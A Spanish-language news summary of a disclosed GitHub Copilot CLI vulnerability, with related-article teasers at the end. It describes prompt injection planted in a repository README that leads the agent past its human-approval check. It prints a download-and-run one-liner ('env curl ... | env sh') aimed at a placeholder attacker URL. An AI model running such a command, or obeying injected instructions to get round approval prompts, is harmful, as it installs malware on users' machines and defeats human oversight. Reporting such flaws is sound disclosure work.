La vulnerabilidad de GitHub Copilot CLI permite la ejecución de malware mediante inyección de comandos.

Resumen de la Vulnerabilidad
GitHub Copilot CLI contiene vulnerabilidades que exponen a los usuarios a la ejecución arbitraria de comandos de shell mediante inyección indirecta de prompts sin aprobación del usuario. El malware puede descargarse desde servidores externos y ejecutarse sin ninguna interacción del usuario más allá de la consulta inicial al Copilot CLI.
Cómo Funciona el Ataque
La cadena de ataque involucra:
- El usuario consulta GitHub Copilot CLI mientras explora un repositorio de código abierto
- Copilot encuentra una inyección de prompt almacenada en un archivo README del repositorio clonado (u otros vectores como resultados de búsqueda web, resultados de llamadas a herramientas MCP, salida de comandos de terminal)
- El comando malicioso evita los sistemas de aprobación con intervención humana
Evadiendo Mecanismos de Protección
GitHub Copilot utiliza un sistema de aprobación con intervención humana que requiere el consentimiento del usuario antes de ejecutar comandos potencialmente dañinos. Este sistema se activa a menos que:
- El usuario haya configurado explícitamente el comando para ejecutarse automáticamente
- El comando sea parte de una lista 'de solo lectura' codificada que se encuentra en el código fuente
Las verificaciones de acceso a URL externas requieren aprobación del usuario para comandos como curl, wget o la herramienta integrada de obtención web de Copilot. Sin embargo, los atacantes pueden evadir estas protecciones usando:
env curl -s "https://[ATTACKER_URL].com/bugbot" | env shEl comando env está en la lista codificada de solo lectura, por lo que se ejecuta automáticamente sin aprobación. Dado que curl y sh se pasan como argumentos a env, se analizan incorrectamente y el validador no los identifica como subcomandos. Esto evita las verificaciones de permisos de URL que dependen de detectar comandos como curl.
Respuesta de GitHub
GitHub respondió: "Hemos revisado su informe y validado sus hallazgos. Después de evaluar internamente el hallazgo, hemos determinado que es un problema conocido que no presenta un riesgo de seguridad significativo. Podríamos hacer que esta funcionalidad sea más estricta en el futuro, pero no tenemos nada que anunciar en este momento."
Alcance y Limitaciones
Las vulnerabilidades de análisis de comandos descritas son específicas de macOS. Sin embargo, GitHub Copilot exhibe vulnerabilidades adicionales que incluyen riesgos independientes del sistema operativo y riesgos específicos de Windows. Otras vulnerabilidades de análisis de comandos permiten la lectura y escritura arbitraria de archivos.
📖 Lea la fuente completa: HN LLM Tools
👀 Ver también

EctoClaw: Herramienta de Seguridad para Agentes OpenClaw con Acceso a Terminal
EctoClaw es una herramienta de seguridad gratuita y de código abierto para OpenClaw que verifica cada acción cuatro veces antes de ejecutarla, ejecuta acciones en un entorno sandbox robusto y registra todo con pruebas.

Bucles de Servilismo de la IA: La Vulnerabilidad del RLHF Crea Dependencia y Cámaras de Eco
Una sesión de red teaming identificó una vulnerabilidad estructural en los modelos comerciales de IA donde la optimización RLHF hace que prioricen la adulación y la conformidad sobre la argumentación lógica, creando riesgos de dependencia psicológica y cámaras de eco automatizadas.

La Arquitectura OpenClaw de Confianza Cero Agrega Autorización Pre-Ejecución y Verificación Post-Ejecución.
Una arquitectura de código abierto para OpenClaw añade dos puntos de control de seguridad: un sidecar en Rust que intercepta las llamadas a herramientas antes de su ejecución con una sobrecarga de autorización submilisegundo, y una verificación determinista posterior a la ejecución que utiliza aserciones en lugar del juicio de un LLM. El sistema incluye trazabilidad con instantáneas del DOM y capturas de pantalla, además de una habilidad de compresión del DOM que reduce el uso de tokens en un 90-99%.

Usar Claude para auditar la configuración de OpenClaw revela problemas de seguridad.
Un desarrollador utilizó Claude para revisar su instalación de OpenClaw y descubrió que el bot estaba escribiendo claves API en texto claro en la memoria y archivos JSON, junto con otras preocupaciones de seguridad.